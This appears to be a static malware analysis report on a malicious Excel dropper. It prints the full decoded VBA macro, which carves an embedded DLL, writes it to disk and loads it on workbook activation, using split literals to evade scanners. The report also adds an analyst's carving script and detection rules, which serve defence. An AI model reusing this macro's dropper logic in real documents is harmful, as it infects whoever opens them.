Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b810aa205bad5883…

MALICIOUS

Office (OLE)

719.0 KB | Created: 2019-08-30 09:14:50 | Authoring application: Microsoft Excel | First seen: 2019-12-09
MD5: b66e001229f38b4f47b5b3891be3dc8b
SHA-1: b231d78d97e278b0c7b172e32ed64060ff24e78c
SHA-256: b810aa205bad5883abcfc758a50d6dc80b8db31b8d88b899f130746a1a0ea29a
440 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic | T1105 Ingress Tool Transfer | T1204.002 User Execution: Malicious File | T1027 Obfuscated Files or Information

The Excel file contains VBA macros whose entry point is Workbook_Activate, which calls Module1.AppStart. AppStart uses WScript.Shell only to resolve two paths stored in the Tag properties of UserForm3's text boxes (one expanded with ExpandEnvironmentStrings, one looked up via SpecialFolders), changes into the first and shows UserForm1; UserForm1's UserForm_Activate handler then calls Module3.ReplaceCurrentModule. That routine copies the workbook's sheets into a new workbook, saves it as favorite.xlsx (FileFormat 51, i.e. OOXML), copies the file to favorite.xlsx.zip and uses Shell.Application (ProgID split as "Shell." + "Application") to pull xl\embeddings\oleObject1.bin out of the zip. NewValuje then scans oleObject1.bin for the byte sequence 77 90 144 ("MZ" followed by 0x90, the usual start of a PE file) and, at the first match under 32-bit Office or the second under 64-bit Office, copies 282,624 or 230,912 bytes into libMongo1.dll or libMongo2.dll in the SpecialFolders path. The DLL is loaded with LoadLibraryW (declared under the alias Bootsrap2) and its export Bootsrap is called. This is a dropper whose payload travels inside the document: the macro contains no download or network activity, so the T1105 tag is not supported by the macro source itself; the LoadLibrary reference is the Declare above, while VirtualAlloc appears only as a string in the carved artifacts, not in the macro.

Two of the critical heuristics matched code that is not on this execution path. The ExecuteExcel4Macro lines flagged as an XLM stager belong to Module3.Sub test, an unreferenced routine that builds a COUNTA() formula over a sheet in web.xlsm; the only ExecuteExcel4Macro calls that run are MESSAGE(False, "Next") in AppStart, which clears the status bar. The adolvl0.* CreateObject calls sit in the unreferenced ITestModule_* procedures. Both read as padding around the real chain. The carved artifact embedded_office_00003384.exe is consistent with a carve from the first MZ header at offset 0x3384 to end of file (13,188 + 723,068 = 736,256 bytes = 719.0 KB), so it spans the rest of the document rather than one clean executable, which also explains the ClamAV miss on it. The two DLL images the macro extracts are consistent with the 526,883-byte Ole10Native stream (282,624 + 230,912 = 513,536 bytes of images plus stream header and the object name). To reproduce, dump the Ole10Native payload (for example with oletools' oleobj), carve the two images with the same marker-and-length logic, and hash and detonate those rather than the 0x3384 carve.
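The carving step above is worth reproducing offline so the two DLL images can be hashed and analysed directly. The following Python is an added analyst example, not code from the sample or from this report: it re-implements the NewValuje routine from the extracted macro (marker bytes 50+27, 50+40, 50+94, the 282,624 / 230,912 byte lengths and the libMongo1.dll / libMongo2.dll names are taken from the macro; SAMPLE is a constructed byte string standing in for oleObject1.bin). It deliberately mirrors the macro's byte-by-byte Get loop rather than using a substring search, because the two disagree on overlapping runs such as MMZ\x90, and it also shows that naive search for comparison.

```python
from __future__ import annotations

import sys
from pathlib import Path

# The three marker bytes NewValuje builds as CByte(50 + 27), CByte(50 + 40),
# CByte(50 + 94): 77 90 144 = b"MZ\x90", the start of a typical DOS/PE header.
MARKER = bytes([50 + 27, 50 + 40, 50 + 94])

# d_6 -> API_LENGTH from ReplaceCurrentModule: match #1 / 282,624 bytes for
# 32-bit Office (libMongo1.dll), match #2 / 230,912 bytes for 64-bit Office.
DLL_LENGTHS = {1: 282624, 2: 230912}
DLL_NAMES = {1: "libMongo1.dll", 2: "libMongo2.dll"}


def vba_marker_offsets(data: bytes) -> list[int]:
    """Offsets NewValuje counts as matches, mirroring its Get-by-Get loop.

    After a byte equals 'M' the *next* byte is consumed as the 'Z' candidate
    even when it is not 'Z', so an overlapping run such as b"MMZ\\x90" is
    skipped by the macro although a plain substring search would count it.
    """
    offsets: list[int] = []
    i, end = 0, len(data)
    while i < end:
        b = data[i]
        i += 1
        if b != MARKER[0] or i >= end:
            continue
        b = data[i]
        i += 1
        if b != MARKER[1] or i >= end:
            continue
        b = data[i]
        i += 1
        if b == MARKER[2]:
            offsets.append(i - 3)
    return offsets


def naive_marker_offsets(data: bytes) -> list[int]:
    """Plain overlapping substring search, for comparison with the VBA logic."""
    offsets: list[int] = []
    pos = data.find(MARKER)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(MARKER, pos + 1)
    return offsets


def carve_nth_mz(data: bytes, n: int, length: int) -> bytes | None:
    """Return the image starting at the n-th marker (1-based), `length` bytes long.

    NewValuje always writes exactly fl bytes; if the stream ends early the
    unfilled tail of its Long array is undefined, so here the slice is simply
    truncated at EOF and the caller can compare len() against `length`.
    """
    offsets = vba_marker_offsets(data)
    if n < 1 or n > len(offsets):
        return None
    start = offsets[n - 1]
    return data[start:start + length]


def carve_dlls(ole_object: bytes, lengths: dict[int, int] = DLL_LENGTHS) -> dict[str, bytes]:
    """Both images the macro can drop, keyed by the file name it would use."""
    out: dict[str, bytes] = {}
    for idx, name in DLL_NAMES.items():
        blob = carve_nth_mz(ole_object, idx, lengths[idx])
        if blob is not None:
            out[name] = blob
    return out


# Constructed stand-in for oleObject1.bin (not data from the sample): two
# 16-byte fake images plus two decoys, b"MZ\x00" (no 0x90) and b"MMZ\x90"
# (counted by a naive search, skipped by the macro's loop).
FAKE_DLL1 = MARKER + b"\x01" * 13
FAKE_DLL2 = MARKER + b"\x02" * 13
SAMPLE = (
    b"\x00" * 8
    + FAKE_DLL1
    + b"MZ\x00"
    + b"MMZ\x90" + b"\x03" * 12
    + FAKE_DLL2
    + b"\xff" * 4
)

if __name__ == "__main__":
    # Usage: python carve_libmongo.py <oleObject1.bin or Ole10Native payload> [outdir]
    if len(sys.argv) < 2:
        print("VBA offsets:", vba_marker_offsets(SAMPLE), "naive:", naive_marker_offsets(SAMPLE))
    else:
        src = Path(sys.argv[1]).read_bytes()
        outdir = Path(sys.argv[2]) if len(sys.argv) > 2 else Path(".")
        for name, blob in carve_dlls(src).items():
            (outdir / name).write_bytes(blob)
            print(f"{name}: {len(blob)} bytes, starts {blob[:4].hex()}")
```

Run it against the Ole10Native payload (ole10native_00.bin on this page, once the stream header is stripped) or against the oleObject1.bin the macro itself extracts on a victim, then compare the two written files' lengths with 282,624 and 230,912: a short second image means the stream did not contain a second MZ\x90 marker at all.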

Heuristics 10

  • ClamAV: Xls.Dropper.Sdrop-7331943-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Sdrop-7331943-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set WaitForSingle = CreateObject("WScript.Shell")
  • VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER
    VBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs / drop payloads while evading AutoOpen and Shell keyword detection; it is a high-confidence macro stager pattern, not a specific Office parser CVE.
    Matched line in script
    Debug.Print Temp1
    CCount = Application.ExecuteExcel4Macro(Temp1)
    Debug.Print CCount
    Caveat: in this sample the matched lines are in Module3.Sub test, which builds a COUNTA() formula over a sheet in web.xlsm and is not called from any event handler. The only ExecuteExcel4Macro calls on the execution path (Module1.AppStart) are MESSAGE(False, "Next"), which clears the status bar. Treat this heuristic as low confidence here; the stager that actually runs is the LoadLibraryW call in ReplaceCurrentModule.
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
            Case 0
                Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnclose")
            Case 1
    Caveat: the adolvl0.* ProgIDs are created only inside ITestModule_GetCase, which nothing in the macro calls. The CreateObject calls that do run are CreateObject("WScript.Shell") in AppStart and CreateObject("Shell." + "Application") in ReplaceCurrentModule, the latter with the ProgID split across two literals so a plain "Shell.Application" string match misses it.
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
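The heuristics above fire on keywords (WScript.Shell, CreateObject, ExecuteExcel4Macro) and, as the caveats note, two of the critical hits land on dead code while the split literal "Shell." + "Application" is not matched at all. The Python below is an added example, not part of this report or of any detection product, of source-level rules that target the chain that actually runs in this macro: an auto-firing event, a kernel32 LoadLibrary import, an import from a non-system DLL, self-extraction of xl\embeddings\oleObject*.bin via Shell.Application, and a binary file write. Adjacent string literals are joined before matching so split ProgIDs and extensions become visible. EXCERPT is assembled from lines of the extracted macro shown on this page; BENIGN is a constructed harmless macro; the rule names and the system-DLL allowlist are my own choices.

```python
import re

# Joins '"a" + "b"' and '"a" & "b"' into one literal, defeating the split
# ProgID / extension trick ("Shell." + "Application", ".d" + "ll").
JOIN_LITERALS = re.compile(r'"\s*[+&]\s*"')
# Declares against these are ordinary API use; anything else .dll is suspicious.
SYSTEM_DLLS = r"(?!kernel32\b|user32\b|advapi32\b|shell32\b|ole32\b|oleaut32\b|ntdll\b)"

# A rule fires only when every one of its patterns matches.
RULES = {
    "auto_event": [
        r"^\s*(Private\s+|Public\s+)?Sub\s+(Workbook_(Open|Activate)|UserForm_(Activate|Initialize)|Auto_Open)\s*\(",
    ],
    "loadlibrary_import": [
        r'Declare\s+(PtrSafe\s+)?Function\s+\w+\s+Lib\s+"kernel32"\s+Alias\s+"LoadLibrary[AW]"',
    ],
    "nonsystem_dll_import": [
        r'Declare\s+(PtrSafe\s+)?Function\s+\w+\s+Lib\s+_?\s*"' + SYSTEM_DLLS + r'[^"]+\.dll"',
    ],
    "self_extracts_embedding": [
        r'CreateObject\(\s*"Shell\.Application"',
        r"xl\\embeddings\\oleObject\d*\.bin",
    ],
    "writes_binary_file": [
        r"\bOpen\s+.+\s+For\s+Binary\b",
        r"^\s*Put\s+#?\w+\s*,",
    ],
}
COMPILED = {name: [re.compile(p, re.I | re.M) for p in pats] for name, pats in RULES.items()}


def normalize(src: str) -> str:
    """Join adjacent string literals so split ProgIDs and paths are searchable."""
    return JOIN_LITERALS.sub("", src)


def split_literal_count(src: str) -> int:
    """Number of literal joins in the raw source; a cheap obfuscation signal."""
    return len(JOIN_LITERALS.findall(src))


def scan(src: str) -> dict:
    """Rule name -> fired, evaluated over the normalized source."""
    text = normalize(src)
    return {name: all(p.search(text) for p in pats) for name, pats in COMPILED.items()}


def verdict(src: str) -> tuple:
    """(number of rules fired, list of their names), in rule order."""
    hits = [name for name, fired in scan(src).items() if fired]
    return len(hits), hits


# Lines copied from the extracted macro on this page (Sem, Module1, Module3).
EXCERPT = r'''
Private Sub Workbook_Activate()
If UserForm1.Visible = False Then
Module1.AppStart
End If
End Sub
#If Win64 Then
    Public Declare PtrSafe Function Bootsrap Lib _
        "libMongo2.dll" () As Integer
    Public Declare PtrSafe Function Bootsrap2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
#End If
    Open nm For Binary Lock Read Write As #d_1
    For i = LBound(d_5) To UBound(d_5)
        Put #d_1, , CByte(d_5(i))
    Next i
nm = nm + ".d" + "ll"
        KillArray ZipFolder & "\oleObj" + "ect*.bin", ZipName, nm
        Set oApp = CreateObject("Shell." + "Application")
        oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")
        No_Bootsrap = Bootsrap2(nm)
        Bootsrap
'''

# Constructed harmless macro: an auto-event alone should not convict a file.
BENIGN = '''
Private Sub Workbook_Open()
    Application.StatusBar = "Loading report"
    Worksheets("Sheet1").Range("A1").Value = Date
End Sub
'''

if __name__ == "__main__":
    for label, src in (("sample excerpt", EXCERPT), ("benign", BENIGN)):
        n, hits = verdict(src)
        print(f"{label}: {n} rule(s) fired {hits}, {split_literal_count(src)} split literal(s)")
```

The point of the normalize step is that the macro's own evasion (splitting "Shell.Application" and ".dll") is exactly what a keyword scanner keys on; joining literals first costs nothing and turns the evasion into a signal via split_literal_count. Scoring requires all patterns of a rule to match, so a benign workbook with only a Workbook_Open handler fires a single low-value rule rather than tripping the binary-write or self-extraction rules.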

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12324 bytes
SHA-256: 1335cf9c55b62e62cfc7e3cb67f2bfd7caed70b057d29bdde217e9f1662bb4c3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sem"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
If UserForm1.Visible = False Then
Module1.AppStart
End If

End Sub

Attribute VB_Name = "Page1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
#If Win64 Then
    Public Declare PtrSafe Function Bootsrap Lib _
        "libMongo2.dll" () As Integer
    Public Declare PtrSafe Function Bootsrap2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
#Else
   Public Declare Function Bootsrap2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
     Public Declare Function Bootsrap Lib _
        "libMongo1.dll" () As Integer
#End If
   


Public Sub NewValuje(s As String, nm As String, fl As Long, d_6 As Integer)
    Dim d_1 As Long, d_2 As Byte, d_3 As Byte, d_4 As Byte
    Dim d_5() As Long

    ReDim d_5(1 To fl)
    d_5(1) = CByte(50 + 27)
    d_5(2) = CByte(50 + 40)
    d_5(3) = CByte(50 + 94)
    
    d_1 = FreeFile
    Open s For Binary Access Read As d_1
    Dim cur As Integer
    cur = 1
    Do While Not EOF(d_1)
        Get d_1, , d_2
        If d_2 = d_5(1) Then
           Get d_1, , d_3
           If d_3 = d_5(2) Then
                Get d_1, , d_4
                If d_4 = d_5(3) Then
                     If cur = d_6 Then
                        For k = 4 To fl
                            Get d_1, , d_2
                            d_5(k) = d_2
                            Next k
                         Exit Do
                     Else
                        cur = cur + 1
                     End If
                End If
           End If
        End If
    Loop
    Close d_1
    
    d_1 = FreeFile
    Open nm For Binary Lock Read Write As #d_1
    For i = LBound(d_5) To UBound(d_5)
        Put #d_1, , CByte(d_5(i))
    Next i

    Close #d_1
End Sub

Public Function ITestModule_GetCase(ByVal lIndex As Long)
    If tracemod Then
        g_errorobj.Transmit "Inside: ITestModule_GetCase(" + CStr(lIndex) + ")" + Chr(10)
    End If
    numcases = numcases + 1
    Select Case lIndex
        Case 0
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnclose")
        Case 1
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cndefdat")
        Case 2
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnexec")
        Case 3
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnmode")
        Case 4
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnopen")
        Case 5
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnprop")
        Case 6
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnprovider")
        Case 7
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnstring")
        Case 8
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cntimeout")
        Case 9
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldactualsize")
        Case 10
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldattributes")
        Case 11
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.flddefinedsize")
        Case 12
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldname")
        Case 13
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldoriginalvalue")
        Case 14
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldprecision")
        Case 15
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldtype")
        Case 16
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldvalue")
        Case 17
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsactivecn")
        Case 18
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsclose")
        Case 19
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmove")
        Case 20
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmovefirst")
        Case 21
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmovenext")
        Case 22
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmoveprev")
        Case 23
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsopen")
        Case 24
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rssource")
        Case 25
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rssupports")
        Case 26
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsbof")
        Case 27
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rseof")
        Case 28
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rscachesize")
        Case 29
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rspagesize")
        Case 30
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsrequery")
  End Select
    ca.ses(numcases - 1).SetCaseError g_errorobj
    ca.ses(numcases - 1).SetCaseProvider g_provobj
    Set Locprov = g_provobj
    Set ITestModule_GetCase = ca.ses(numcases - 1)
End Function
Public Function ITestModule_GetErrorInterface()
    Set ITestModule_GetErrorInterface = g_errorobj
End Function
Public Function ITestModule_GetProviderInterface()
    Set ITestModule_GetProviderInterface = g_provobj
End Function
Public Sub ITestModule_SetErrorInterface(ByVal pError)
    Set g_errorobj = pError
    If tracemod Then
        g_errorobj.Transmit "Inside: ITestModule_SetErrorInterface" + Chr(10)
    End If
End Sub
Public Sub ITestModule_SetMallocSpyCallback(pbVoodoo As Byte)
    tracemod = False
    numcases = 0
    'MsgBox ("ITestModule_SetMallocSpyCallback")
End Sub
Public Sub ITestModule_SetProviderInterface(ByVal pProvInfo)
On Error GoTo ixx
    Set g_provobj = pProvInfo
    For i = 0 To numcases - 1
        ca.ses(i).SetCaseProvider g_provobj
    Next i
Exit Sub
ixx:
MsgBox Err.Description
End Sub
Public Function ITestModule_Terminate() As Boolean
    ITestModule_Terminate = True
End Function
Public Sub AppStart()

ExecuteExcel4Macro "MESSAGE(False, ""Next"")"
Dim WaitForSingle As Object
    Dim SpecialPath As String
    

Set WaitForSingle = CreateObject("WScript.Shell")
   
UserForm3.TextBox1.Tag = WaitForSingle.ExpandEnvironmentStrings("%" + UserForm3.TextBox1.Tag + "%")

UserForm3.TextBox1.Tag = Replace(UserForm3.TextBox1.Tag, "%", "")
UserForm3.TextBox2.Tag = WaitForSingle.SpecialFolders(UserForm3.TextBox2.Tag)

ChDir (UserForm3.TextBox1.Tag)

    UserForm1.show
ExecuteExcel4Macro "MESSAGE(False, ""Next"")"
End Sub



Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{5A3D2CBB-FB46-4DB2-AF06-BE71FA9283E9}{2B3E03C1-B346-4B10-B5BC-52032E0329B2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()

End Sub

Private Sub UserForm_Activate()
DoEvents
ReplaceCurrentModule
End Sub

Private Sub UserForm_Initialize()
Call SystemButtonSettings(Me, False)

End Sub

Attribute VB_Name = "Module2"
Private Const GWL_STYLE = -16
Private Const WS_CAPTION = &HC00000
Private Const WS_SYSMENU = &H80000

#If VBA7 Then

    Private Declare PtrSafe Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As Long, _
        ByVal nIndex As Long) As Long
    Private Declare PtrSafe Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" (ByVal hWnd As Long, _
        ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare PtrSafe Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare PtrSafe Function DrawMenuBar _
        Lib "user32" (ByVal hWnd As Long) As Long
        
#Else

    Private Declare Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" ( _
        ByVal hWnd As Long, ByVal nIndex As Long) As Long
    Private Declare Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" ( _
        ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare Function DrawMenuBar _
        Lib "user32" (ByVal hWnd As Long) As Long
  
#End If



Public Sub KillArray(ParamArray PathList() As Variant)
    On Error Resume Next
    For Each Key In PathList
        Kill Key
    Next Key
    On Error GoTo 0
End Sub




Public Sub SystemButtonSettings(frm As Object, show As Boolean)
Dim windowStyle As Long
Dim windowHandle As Long

windowHandle = FindWindowA(vbNullString, frm.Caption)
windowStyle = GetWindowLong(windowHandle, GWL_STYLE)

If show = False Then

    SetWindowLong windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)

Else

    SetWindowLong windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)

End If

DrawMenuBar (windowHandle)

End Sub



Attribute VB_Name = "Module3"

Sub test()

Temp = "'" & ThisWorkbook.Path & "\[web.xlsm]Sheet1'!"
Temp1 = Temp & Rows(1).Address(, , xlR1C1)
Temp1 = "Counta(" & Temp1 & ")"
Debug.Print Temp1
CCount = Application.ExecuteExcel4Macro(Temp1)
Debug.Print CCount
Temp2 = Temp & Columns("A").Address(, , xlR1C1)
Temp2 = "Counta(" & Temp2 & ")"
RCount = Application.ExecuteExcel4Macro(Temp2)
ReDim arr(1 To RCount, 1 To CCount)

For R = 1 To RCount
    For C = 1 To CCount
        Temp3 = Temp & Cells(R, C).Address(, , xlR1C1)
        arr(R, C) = Application.ExecuteExcel4Macro(Temp3)
    Next
Next

Range("A1").Resize(RCount, CCount).Value = arr   ' shown as ReAPI_LENGTH in the decoded source: the decoder's rename of "size" to "API_LENGTH" (see ReplaceCurrentModule) also hit the Resize method

End Sub




Public Sub ReplaceCurrentModule()
    NameFav = UserForm3.TextBox1.Tag + "\favorite" + ".xlsx"
    ZipName = NameFav + ".zip"
    ZipFolder = UserForm3.TextBox1.Tag '& "\UnzTmp"
    Dim nm As String
    Dim API_LENGTH As Long
    Dim d_6 As Integer
    nm = UserForm3.TextBox2.Tag + "\libMongo1"
    API_LENGTH = 282624
    d_6 = 1
            
#If Win64 Then
    nm = UserForm3.TextBox2.Tag + "\libMongo2"
    API_LENGTH = 230912
    d_6 = 2
#End If
nm = nm + ".d" + "ll"
        KillArray ZipFolder & "\oleObj" + "ect*.bin", ZipName, nm
        
    DoEvents
        ThisWorkbook.Sheets.Copy
        Application.DisplayAlerts = False
        ActiveWorkbook.SaveAs NameFav, FileFormat:=51
    DoEvents
    ActiveWorkbook.Close
    DoEvents
        
    
        FileCopy NameFav, ZipName
        
        Set oApp = CreateObject("Shell." + "Application")
        oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")
        NewValuje ZipFolder + "\oleObject1.bin", nm, API_LENGTH, d_6
        
        ChDir (UserForm3.TextBox2.Tag)
        No_Bootsrap = Bootsrap2(nm)
        Bootsrap

End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{C6DC58FE-06D5-4E80-95FA-170CB81DE014}{681B466D-E30B-41B1-9314-F7CBD4BFF3AE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module4"

Attribute VB_Name = "Module5"

Attribute VB_Name = "Module6"
embedded_office_00003384.exe | embedded-pe | Office MZ+PE at offset 0x3384 | 723068 bytes
SHA-256: 4f858f9af608f99073b952a45289a66aa49e1e614a54377cbad72638d9941332
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript.Shell
ole10native_00.bin | ole-package | OLE Ole10Native stream: MBD00FAA26E/Ole10Native | 526883 bytes
SHA-256: aa7d415120f22ad80905c574ffb39ef59713b52a70790d214c689b634aa314ad